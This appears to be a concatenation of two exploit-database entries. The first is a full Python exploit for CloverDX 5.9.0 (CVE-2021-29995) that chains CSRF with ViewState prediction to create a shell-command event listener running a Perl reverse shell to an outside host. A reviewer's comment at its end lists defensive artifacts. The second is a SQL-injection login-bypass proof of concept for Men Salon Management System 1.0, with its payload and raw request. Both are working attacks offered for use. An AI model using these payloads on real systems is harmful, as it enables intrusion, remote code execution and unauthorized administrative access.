# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE) # Date: 14.04.2021 # Exploit Author: niebardzo # Vendor Homepage: https://www.cloverdx.com/ # Software Link: https://github.com/cloverdx/cloverdx-server-docker # Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x # Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker # CVE : CVE-2021-29995 # Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX # Victim authenticated to CloverDX and the java to run the ViewStateCracker.java. # Reference for cracking ViewState: # https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html # https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 # import http.server import socketserver import requests from urllib.parse import urlparse from urllib.parse import parse_qs from bs4 import BeautifulSoup import subprocess import sys import json class ExploitHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") self.end_headers() # replace with your own target target = "http://localhost:8080" query_comp = parse_qs(urlparse(self.path).query) if "target" in query_comp: target = query_comp["target"][0] req = requests.get(target+"/clover/gui/login.jsf") if req.status_code != 200: sys.exit(-1) # parse the reponse retrieve the ViewState soup = BeautifulSoup(req.text, "html.parser") cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"] # Use the ViewstateCracker.java to get new Viewstate. 
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state]) new_view_state = new_view_state.decode("utf-8").strip() print(new_view_state) if new_view_state == "6927638971750518694:6717304323717288036": html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>" + "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>") else: html = ("<!DOCTYPE html><html><head>" + "<script>" + "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}" + "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}" + "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}" + "function exec4(){document.getElementById('form4').submit();}" + "</script>" + "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>" + "<script>history.pushState('','/');</script>" + "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" + "<input type='hidden' value='headerForm:manualListenerItem' name='javax.faces.source'>" + "<input type='hidden' value='@all' name='javax.faces.partial.execute'>" + "<input type='hidden' value='allContent' name='javax.faces.partial.render'>" + "<input type='hidden' value='headerForm:manualListenerItem' name='headerForm:manualListenerItem'>" + "<input type='hidden' value='headerForm' name='headerForm'>" + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":")) + "<input type='submit' value='' style='visibility: hidden;'></form> " 
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" + "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.source'>" + "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.partial.execute'>" + "<input type='hidden' value='manualListeneForm:taskFormFragment' name='javax.faces.partial.render'>" + "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>" + "<input type='hidden' value='change' name='javax.faces.partial.event'>" + "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>" + "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>" + "<input type='hidden' value='on' name='manualListeneForm:saveRunRecord_input'>" + "<input type='hidden' value='true' name='manualListeneForm:manualVariablesList_collapsed'>" + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":")) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) + "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" + "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>" + "<input type='hidden' value='@all' name='javax.faces.partial.execute'>" + "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>" + "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm:execute_button'>" + "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>" + "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propName'>" + "<input 
type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propValue'>" + "<input type='hidden' value='' name='manualListeneForm:taskType_focus'>" + "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>" # # Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode. # + "<input type='hidden' value='perl -e 'use Socket;$i="192.168.65.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'' name='manualListeneForm:shellEditor'>" + "<input type='hidden' value='' name='manualListeneForm:workingDirectory'>" + "<input type='hidden' value='10000' name='manualListeneForm:timeout'>" + "<input type='hidden' value='true' name='manualListeneForm:scriptVariablesList_collapsed'>" + "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":")) + "<input type='submit' value='' style='visibility: hidden;'></form> " + "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>" + "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>" + "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>" + "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>" + "</body></html>") self.wfile.write(bytes(html,"utf-8")) base64_enc_viewstatecracker = "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" # # This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 # with open("ViewstateCracker.java","w") as f: f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8')) exploit_handler = ExploitHandler PORT = 6010 exploit_server = socketserver.TCPServer(("", PORT), exploit_handler) exploit_server.serve_forever()
# NOTE(review): what the served page does, as far as the visible text shows:
# the victim's browser is driven through one GET and three POSTs to
# {target}/clover/gui/event-listeners (each POST carrying
# javax.faces.partial.ajax=true and a predicted javax.faces.ViewState), and the
# final POST creates an event listener with taskType_input=shell_command whose
# shellEditor value is the hardcoded perl one-liner above (callback to
# 192.168.65.2:4444). From a defensive standpoint the artifacts to review are
# presumably unexpected "shell_command" event listeners in the CloverDX
# configuration and this POST sequence in its access/audit logs — confirm
# against the product's logging before relying on it.
-
Men Salon Management System 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Men Salon Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-07-30 # Exploit Author: Akshay Khanna (ConfusedBot) # Vendor Homepage: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10/Kali Linux *POC* Step 1 – Go to the URL http://localhost:8080/Men/Salon/Management/System/Project/msms/admin/index.php Step 2 – Enter anything in the username and password fields Step 3 – Click Login and capture the request in Burp Suite Step 4 – Change the username to admin ' or '1'='1'# Step 5 – Click Forward; you will now be logged in as admin. REQUEST POST /Men/Salon/Management/System/Project/msms/admin/index.php HTTP/1.1 Host: localhost:8080 Content-Length: 67 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/Men%20Salon%20Management%20System%20Project/msms/admin/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=fmo6opiohab5jf02r13db3f459 Connection: close username=admin+%27+or+%271%27%3D%271%27%23&password=a&login=Sign+In